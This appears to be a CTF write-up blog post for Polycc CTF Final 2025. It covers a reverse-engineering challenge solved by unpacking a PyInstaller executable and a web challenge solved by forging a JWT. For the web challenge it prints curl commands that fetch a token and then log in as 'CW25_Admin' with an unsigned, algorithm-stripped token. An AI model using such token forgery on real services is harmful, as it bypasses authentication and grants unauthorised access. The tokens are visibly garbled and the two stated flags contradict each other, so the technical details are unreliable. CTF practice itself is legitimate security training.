Post

Polycc CTF Final 2025

Reverse Engineering Walkthrough and Web Exploitation

Polycc CTF Final 2025

🧩 Reverse Engineering

Challenge Description

Dont be fooled by the initial display; the flag shown when the program executes isn’t the actual target .Your task is to uncover it by examining the depth of the executable’s internal structure.There is something somewhere in Backend.

💥 Exploit Analysis

can u

This file showing was packed by pyinstaller to exe file by using Pyinstaller Extractor Web to get the source code in python .

can u

1
Flag : ctfcw{wow_you_beat_me}

🌐 Web Exploitation

Challenge Description : None

Just Weird Thoughts

can u

💥 Exploit Analysis

🕵️‍♀️ Source Code Analysis


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
try {
const tokenResponse = await fetch("/get_token");
const tokenData = await tokenResponse.json();
currentToken = tokenData.token;

const loginResponse = await fetch("/login", {
method: "POST",
headers: {
"Content-Type": "application/json",
},
body: JSON.stringify({ magic_token: currentToken }),
});

const loginData = await loginResponse.json();

if (loginResponse.ok) {
if (loginData.flag) {
showMessage(
"Success! " +
loginData.message +
"\n\nFlag: " +
loginData.flag,
"success"
);
} else {
showMessage("Logged in successfully!", "success");
}
} else {
showMessage("Access restricted: " + loginData.message, "error");
}
} catch (error) {
showMessage("Error: " + error.message, "error");
};

function showMessage(message, type) {
resultMessage.textContent = message;
resultMessage.className = "result-message";
resultMessage.classList.add(type + "-message");
resultMessage.style.display = "block";
}
;
1
const tokenResponse = await fetch("/get_token");

By visiting /get_token will provide JWT Token .

1
2
$ curl http://35.185.184.31:3000/get_token
{"token":"eyJhb6c101JU2I1M15InR5cc16ItpXVCJ9 eyJpZCf6N8wIdXNLcm5hbMUiO1JDVzT1X IVzZX11LCJpYXQ10JESNTI2NDW2NZESImV4CCf6NTcIMjY0WzI3Wx0 idUM4RLrExfqt1a6RDevs3Tqa qDp11xovqq14wq384"}

I tried to change this earlier since on username : “CW25_Admin” only but looks its like required me to have the secret key i tried to find all the way the secret key and could find it and bruteforcing all the way . so I tried disable the alg and maybe the server are vulnerable to JWT Algorithm Confusion Attack .

1
2
3
4
5
[Kafka@faris]--[~]
$ curl -X POST http://35.185.184.31:3000/login \
> -H "Content-Type: application/json" \
> -d '{"magic_token":"eyJhb6c101Jub251I1wIdHlWljoiSldUrno eyJpZCf6N8wIdXNLcm5hbMUi O1JDVzT1X0FKbMU1uHaMF01joXkUyNjQzNjcxLCJ1eHA10jESNTI2NDcyNzF9."}'
{"flag":"CW25(CW25_CW25_CW25_CW25_CW25_!!!!!!)","message":"Congratulations ! You've solved the challenge!"}
1
Flag : ctfcw{CW25CW25_CW25_CW25_CW25_CW25_!!!!!!}
This post is licensed under CC BY 4.0 by the author.